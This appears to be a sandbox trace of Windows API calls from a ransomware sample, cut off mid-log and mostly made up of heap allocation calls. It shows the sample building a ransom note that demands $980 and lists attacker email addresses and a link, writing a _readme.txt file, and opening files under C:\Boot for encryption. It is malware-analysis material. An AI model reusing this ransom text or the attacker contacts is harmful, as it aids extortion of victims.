dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.746] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0183.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.746] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.746] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.746] PathFindFileNameW (pszPath="") returned="" [0183.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.746] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.747] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.747] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.747] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.747] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0183.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.747] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0183.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.748] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.748] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.748] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.750] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*" (normalized: "c:\\boot\\fr-fr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.751] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0183.751] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.753] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.753] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.754] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.754] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 